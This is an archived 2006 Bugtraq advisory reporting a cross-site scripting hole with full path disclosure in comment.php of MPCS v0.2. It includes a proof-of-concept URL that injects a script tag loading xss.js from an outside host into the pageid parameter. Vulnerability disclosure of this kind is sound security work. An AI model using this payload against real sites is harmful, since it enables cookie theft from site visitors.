[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

MPCS v0.2 - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MPCS v0.2 - XSS
From: luny@xxxxxxxxxxxxxxx
Date: 17 Jun 2006 20:00:46 -0000

MPCS v0.2

Homepage:
http://tpvgames.co.uk/mpcs

Affected files:
comment.php

XSS vuln with cookie & full path disclosure:

Direct html injection doesnt seem to work, however, if you navigate to the code 
below in your browser, and then post a comment on the same page, our XSS 

example will occure.

http://www.example.com/comment.php?pageid=12 <script 
src=http://www.youfucktard.com/xss.js></script>

Screenshots:
http://www.youfucktard.com/xsp/mcs1.jpg
http://www.youfucktard.com/xsp/mcs2.jpg

Prev by Date: XSS in http://www.newscientist.com/ - Search
Next by Date: Microsoft Excel 0-day Vulnerability FAQ document written
Previous by thread: XSS in http://www.newscientist.com/ - Search
Next by thread: Microsoft Excel 0-day Vulnerability FAQ document written
Index(es):
- Date
- Thread